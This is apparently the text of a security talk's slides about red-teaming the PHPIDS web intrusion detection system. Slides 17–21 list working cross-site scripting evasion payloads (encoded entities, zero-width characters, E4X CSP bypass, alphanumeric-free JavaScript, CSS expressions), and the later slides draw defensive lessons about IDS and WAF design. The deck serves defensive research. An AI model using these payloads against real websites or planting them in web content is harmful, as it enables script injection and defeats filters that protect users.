  • 17. Time for entity and encoding fun.... Oh noez - the red team reacts! Malformed entities Zero padded Mixed hex/dec Encoded data urls Base64 - fun fact: that really generated headaches for the blue team Unexpected unicode characters Unicode spaces  Allowed padding   a&#8205lert(1) // FF2 stuff ale&zwj;rt(1) // Zero width joiner FF2
  • 18. Entity fun continued.... Double encoded entities <isindex/type=image xyz=&lt; iframe/src=javascript&amp;#x3a&amp; #x61lert&amp;#x28&amp;#x31&amp;#x29&gt; onerror=undefined,///,outerHTML=xyz src=1> <img title=javascript:&amp;#97lert(1) src="x" alt="y"onerror=undefined,[undefined, [UR&#76&#61title],undefined]>
  • 19. Forgotten features Getters/Setters  o={b setter:Function}.b='alertx28x31x29'; new o Language attribute IE  <body/id="1"onload=MsgBox+"xss" language=vbs> Data Islands, HTC, HTA... Ways to change the location  Detect location=name w/o false alerts for a start JS based CSS expressions document.styleSheets(0).cssText=name HTML encoded comments in javascript! <body onload=&lt;!--&#10alert(1)>
  • 20. Pre-implemented future features and standards Video/Audio tags New events onurlflip, ononline, onbounce, oncellchange... CSS Expression closures Array extras New String functions E4X self injecting vectors - Bypasses Mozilla CSP <html><head> <title>CSP e4x injection</title> <script src="#"></script> </head><body>{alert(1)}</body></html>
  • 21. JavaScript is weird Math operations on functions +alert(1);alert(1)++;.1.*in<></>in{}in[] in~alert('mmmmm js weirdness')++in~[] Strings out of large numbers top[(Number.MAX_VALUE/45268).toString(36). slice(15,19)]((Number.MAX_VALUE/99808). toString(36).slice(71,76)+'("XSS")') Getting window (0,[].sort)();(1,[].reverse)();// FF only Yosuke Hasegawa script without a-z0-9  (Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç [È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å) Expressions <div style="00078073 s:e&#92&#120p&#47;&#42;&#106;&#42;&#47; 0007200065 ssion(window.x?0:(alert(/XSS/),window.x=1));"></div>
  • 22. Ssso, what did we learn today
  • 23. You'll never get what you expect Defending against the stuff you know doesn't make you safe Web technologies are rocket science, browsers are monsters Building an IDS is no fire and forget job
  • 24. Web technologies aren't pandora's box... they just support it too
  • 25. An IDS is a constantly evolving middleware Cover the RFCs, brower capabilities, web app peculiarities, encoding quirks, application bugs, etc. etc. There is no golden path to stride on Long release cycles are a no-go Stable trunk versus monthly releases
  • 26. Community IDS versus commercial products Where are the smoketests, where are the challenges Where's the hive mind knowledge Utilizing pressure for better product quality Faster fixes New approaches Better communication with users amd attackers And a lot of WAFs with questionable XSS protection  No vendor names.. no worries :) WafW00f, XSS on vendor sites, obvious circumventions
  • 28. Maybe... Security - especially web sec is no lone wolf mission Locking away the rules and best practices don't always work Without community support it's hard to create a grown and capable product Link with the attackers
  • 29. Generate communities  and challenges It's a win-win anyway The vulnerabilities are in the design - patches can't heal the patient Give credit and admit that 100% security just ain't possible Spread knowledge to avoid having it wither
  • 30. Credits Talking about credits  Thanks to  Christian, Lars, sdc, thornmaker, ma1, lightos, Reiners, Kishor, Martin Hinks,tx, rvdh, beford, the Schokokeks team and all the other people who helped building, attacking and hardening the PHPIDS... And why not give us a small visit http://php-ids.org http://thespanner.co.uk http://sla.ckers.org/forum/list.php?24
  • 31. That's it for now - thanks!   Red team couldn't resist.....   Image() . ownerDocument . documentElement . innerHTML+=name The red team - attempting to infiltrate the blue team's camp